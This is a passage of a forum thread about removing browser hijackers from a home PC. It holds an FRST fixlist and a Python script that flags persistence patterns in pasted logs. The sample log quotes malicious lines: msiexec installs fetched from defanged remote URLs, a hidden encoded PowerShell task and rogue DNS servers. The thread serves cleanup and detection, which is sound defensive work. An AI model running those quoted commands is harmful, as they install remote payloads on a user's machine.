FirewallRules: [{B73F402C-DA8A-47CC-BDDB-2CB28223AAFE}] => (Allow) C:\Program Files (x86)\MIO\loader\st9500325as_5ve73x59xxxx5ve73x59.exe
FirewallRules: [{10CBA690-7C1B-4B05-83B8-A5FADB8377C8}] => (Allow) C:\Program Files (x86)\MIO\loader\st9500325as_5ve73x59xxxx5ve73x59.exe
FirewallRules: [{A60121B4-F1C3-420E-892E-B054242BB370}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{908725CB-3774-4898-A61B-A5DC036FF404}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{64BC6AD6-B538-44AD-8B02-DD0D06057214}] => (Allow) C:\Program Files (x86)\Hotleaf\Application\chrome.exe
C:\Users\Alberto\AppData\Local\background_fault\aswRD.exe
CMD: ipconfig /flushdns
CreateRestorePoint:
RemoveProxy:
Emptytemp:
Hosts:
reboot:
end


I had put the script together, and it ties the browser compromise to hijackers.
Firefox was replaced by a fake:

C:\Program Files (x86)\Mozilla Firefox\firefox.exe

C:\Program Files (x86)\Firefox\Firefox.exe << Fake!

But I decided to change my instruction to another possible script, a leaner one with less impact on the machine.

Regards
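A triage pass over the kind of FRST output joram worked from, as an added example that is not part of the original thread and not an FRST feature. It reads lines in the format FRST prints (the sample below is built from lines in the fixlist above, with the Portuguese FRST markers left as printed, plus one benign Avast task as a control), flags the patterns that make this log dangerous rather than merely junk-ridden (a Winlogon Shell value that launches msiexec against a remote URL, a scheduled task running hidden PowerShell with an encoded command, static DNS servers, a non-default hosts entry, an unsigned service binary under AppData and a driver registered from Temp), and decodes the -EncodedCommand prefix. The rule names, the `expected_dns` allow-list and the decode helper are this example's own conventions, not FRST's.

```python
"""Triage of FRST-style log lines for the persistence and hijack patterns
that appear in the fixlist above. Added example for this thread: not part
of FRST and not the helper's own script. It only reads pasted log text."""
import base64
import re

# Constructed input: lines copied from the fixlist posted above (Portuguese
# FRST markers kept as printed) plus one benign Avast task as a control.
# FRST cut the -EncodedCommand blob after this prefix, so the decode below
# only shows the start of the script.
SAMPLE_LOG = r"""
HKU\S-1-5-21-3252762061-874905821-2166521-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj8xRTqcMUZWRkM8NTLWRTwyRWY1RTzQNTEyMWI8RWhQNH== /q <==== ATENÇÃO
Hosts: 0.0.0.0 csgob0t.online
Tcpip\Parameters: [NameServer] 82.163.143.176 82.163.142.178
S2 3DM; C:\Users\Alberto\AppData\Local\3DM\Kitty.dll [754688 2017-04-20] () [Arquivo não assinado] <==== ATENÇÃO
S1 p1487941280am; \??\C:\Users\Alberto\AppData\Local\Temp\bkA3D.tmp\p1487941280am.sys [X] <==== ATENÇÃO
Task: {3C1EDDF4-62E1-4E44-941D-48C1943476BC} - System32\Tasks\{0E047847-0E7A-0B08-7811-0A050B7D1108} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA <==== ATENÇÃO
Task: {6793D145-3A79-49FC-B870-51FC1C2AA1C6} - System32\Tasks\Tahophwovesp => msiexec /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST9500325AS_5VE73X59XXXX5VE73X59&v=2017210 /q <==== ATENÇÃO
Task: {D96FBEBB-3B1B-430D-A611-2F357CBAC738} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2018-01-06] (AVAST Software)
"""

ENC_RE = re.compile(r"-(?:EncodedCommand|enc)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
SHELL_RE = re.compile(r"\[Shell\]\s+(.+?)(?:\s+<====|$)")
REMOTE_MSI_RE = re.compile(r"msiexec(?:\.exe)?\s+/i\s+h(?:xx|tt)ps?://", re.IGNORECASE)  # hxxp = defanged
DNS_RE = re.compile(r"\[NameServer\]\s+([\d. ]+)")
SERVICE_RE = re.compile(r"^[SRU][0-4]\s+\S+;\s+(.*)$")  # FRST service / driver line
TEMP_DRIVER_RE = re.compile(r"\\Temp\\.*\.sys\b", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\(?:AppData|Temp|ProgramData|Users\\Public)\\", re.IGNORECASE)
UNSIGNED_MARKERS = ("[File not signed]", "[Arquivo não assinado]")  # English / pt-BR FRST
DEFAULT_HOSTS = {"127.0.0.1 localhost", "::1 localhost"}


def decode_encoded_command(blob: str) -> str:
    """Decode a PowerShell -EncodedCommand value (base64 of UTF-16LE text).
    Tolerates a truncated blob like the one pasted in the thread: a dangling
    base64 character is dropped, padding restored, a trailing odd byte cut."""
    blob = blob.strip()
    if len(blob) % 4 == 1:
        blob = blob[:-1]
    blob += "=" * (-len(blob) % 4)
    raw = base64.b64decode(blob)
    if len(raw) % 2:
        raw = raw[:-1]
    return raw.decode("utf-16-le", errors="replace")


def check_line(line: str, expected_dns: frozenset = frozenset()) -> list:
    """Return (rule, detail) pairs for one FRST log line; empty if nothing fires."""
    hits = []
    m = SHELL_RE.search(line)
    if m and m.group(1).strip().lower() != "explorer.exe":
        hits.append(("winlogon-shell", m.group(1)))  # extra payload started with the shell at logon
    if REMOTE_MSI_RE.search(line):
        hits.append(("remote-msi", "msiexec installs a package fetched over HTTP"))
    m = ENC_RE.search(line)
    if m:
        hits.append(("encoded-powershell", decode_encoded_command(m.group(1))))
    m = DNS_RE.search(line)
    if m:
        # Static NameServer values on a DHCP home PC are suspect unless known-good.
        unexpected = [s for s in m.group(1).split() if s not in expected_dns]
        if unexpected:
            hits.append(("static-dns", " ".join(unexpected)))
    if line.startswith("Hosts:"):
        entry = line[len("Hosts:"):].strip()
        if entry and entry not in DEFAULT_HOSTS:
            hits.append(("hosts-entry", entry))
    m = SERVICE_RE.match(line)
    if m:
        body = m.group(1)
        path = body.split(" [")[0]  # strip FRST's "[size date] (signer)" suffix
        if any(mk in body for mk in UNSIGNED_MARKERS) and USER_WRITABLE_RE.search(body):
            hits.append(("unsigned-user-path", path))
        if TEMP_DRIVER_RE.search(body):
            hits.append(("driver-in-temp", path))
    return hits


def triage(text: str, expected_dns: frozenset = frozenset()) -> list:
    """Run check_line over a whole log; each finding keeps the original line for the fixlist."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if line:
            for rule, detail in check_line(line, expected_dns):
                findings.append({"rule": rule, "detail": detail, "line": line})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f['rule']:20} {f['detail'][:90]}")
```

On the sample the decoded prefix reads `$ErrorActionPreference="stop";$sc="SilentlyContinue";$WarningPreference=$sc;$Prog`, i.e. the opening of a full script that suppresses its own warnings, not a one-liner; FRST notes 9520 more characters after the cut, so decode the complete command from the task's XML under C:\Windows\System32\Tasks on the machine before judging what else it does. The two `remote-msi` hits (the Shell value and the Tahophwovesp task) are the re-infection paths and belong at the top of any fixlist; and since the fixlist itself removes static NameServer entries, a DNS alert from ZHPCleaner on this machine is worth reading rather than dismissing.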
TmfeijoMMonroe (Cyber Highlander, registered member; 13.7K posts, 4.2K likes)
#7 by TmfeijoMMonroe
23/03/2018 - 09:16
Komm said:
Since both antivirus products are from Avast and use the same engine, it makes no difference which one stays on the machine. Logically, the one that was not active was the one to go.

Regards.


True; we still need to tell the author being helped to remove AVG from his father's laptop too, since it already belongs to Avast.
And turn on Windows Defender so he's hyper and macro protected.

Regards
© 1999-2024 Hardware.com.br. All rights reserved.